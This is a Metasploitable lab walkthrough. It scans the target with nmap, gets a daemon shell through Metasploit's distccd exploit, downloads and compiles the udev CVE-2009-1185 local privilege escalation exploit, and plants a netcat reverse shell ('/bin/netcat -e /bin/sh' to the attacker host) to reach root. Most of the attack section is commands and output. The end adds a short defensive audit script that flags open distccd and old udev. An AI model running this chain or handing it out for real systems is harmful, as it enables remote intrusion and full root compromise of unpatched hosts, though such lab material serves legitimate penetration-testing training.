# Metasploitable (distccd + udev)

## Introduction

Metasploitable virtual machine (01, 02, 03, 04)
udev < 141 Local Privilege Escalation Exploit

## Execution

Scan from the Metasploit console, exploit distccd to get a `daemon` shell, then escalate with the udev exploit. Lines prefixed with `#` are run on the attacker host (192.168.1.100); the target is 192.168.1.50.

```text
# msfconsole
msf > nmap -sV -O -p 1-65535 192.168.1.50
[*] exec: nmap -sV -O -p 1-65535 192.168.1.50

Not shown: 65523 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  http
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > search distccd
msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set rhost 192.168.1.50
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set payload cmd/unix/bind_ruby
# nc -vl 1234
msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.100:56362 -> 192.168.1.50:4444)
```

Inside the `daemon` shell obtained through distccd:

```text
uname -a
Linux metasploitable 2.6.24-16-server
whoami
daemon
wget http://www.exploit-db.com/download/8572
mv index.html cve-2009-1185.c
gcc -o cve-2009-1185 cve-2009-1185.c
echo "#!/bin/sh\n/bin/netcat -e /bin/sh 192.168.1.100 1234" > /tmp/run
ps axuf | grep udev | grep -v grep
root      2479  0.0  0.0   2104   708 ?        Ss  05:32   0:00 /sbin/udevd --daemon
./cve-2009-1185 2478 # =2479-1
```

On the attacker host, the listener started earlier receives the root shell:

```text
# nc -vl 1234
Connection from 192.168.1.50 port 1234 [tcp/*] accepted
uname -a
Linux metasploitable 2.6.24-16-server
whoami
root
```
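The chain above depends on two exposures: a distccd service reachable from the network and a udev build older than 141. The following audit script is an added example, not part of the original post, that flags both from a defender's side. It assumes the audited host answers `udevadm --version` with a leading version integer, and the scan table it parses is a constructed sample in the same `PORT STATE SERVICE` layout as the nmap output above.

```shell
#!/bin/sh
# Added audit example (not from the original post). Flags the two exposures
# the walkthrough relies on: an open distccd port in an nmap report and a
# udev version below 141.

# udev_is_vulnerable VERSION -> exit 0 if VERSION is below 141 (the bound
# named in the post), 1 if it is 141 or newer, 2 if VERSION is not numeric.
udev_is_vulnerable() {
    case "$1" in
        ''|*[!0-9]*) return 2 ;;
    esac
    [ "$1" -lt 141 ]
}

# local_udev_version -> prints the leading integer of `udevadm --version`
# (nothing when udevadm is not installed). The command name and output shape
# are assumptions about the audited host.
local_udev_version() {
    if command -v udevadm >/dev/null 2>&1; then
        udevadm --version 2>/dev/null | sed -n '1s/^[^0-9]*\([0-9]*\).*/\1/p'
    fi
}

# distcc_ports -> reads nmap "PORT STATE SERVICE" lines on stdin and prints
# the port numbers whose service is distccd and whose state is open.
distcc_ports() {
    awk '$2 == "open" && $3 == "distccd" { sub(/\/.*/, "", $1); print $1 }'
}

# Constructed sample: a subset of the port table from the post's scan.
SAMPLE_SCAN='PORT     STATE SERVICE
22/tcp   open  ssh
3632/tcp open  distccd
5432/tcp open  postgresql'

# audit -> prints one finding per exposure; never aborts the shell.
audit() {
    for p in $(printf '%s\n' "$SAMPLE_SCAN" | distcc_ports); do
        echo "distccd open on port $p: restrict clients with --allow or firewall the port"
    done
    v=$(local_udev_version)
    if [ -z "$v" ]; then
        echo "udev: udevadm not found, version unknown"
        return 0
    fi
    rc=0
    udev_is_vulnerable "$v" || rc=$?
    case "$rc" in
        0) echo "udev $v: older than 141, update udev" ;;
        1) echo "udev $v: at or above 141" ;;
        *) echo "udev: could not parse version '$v'" ;;
    esac
}

audit
```

The version comparison is kept in its own function so it can be checked against known values; the live `udevadm` call is isolated so the script degrades to "version unknown" rather than failing on hosts without it.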
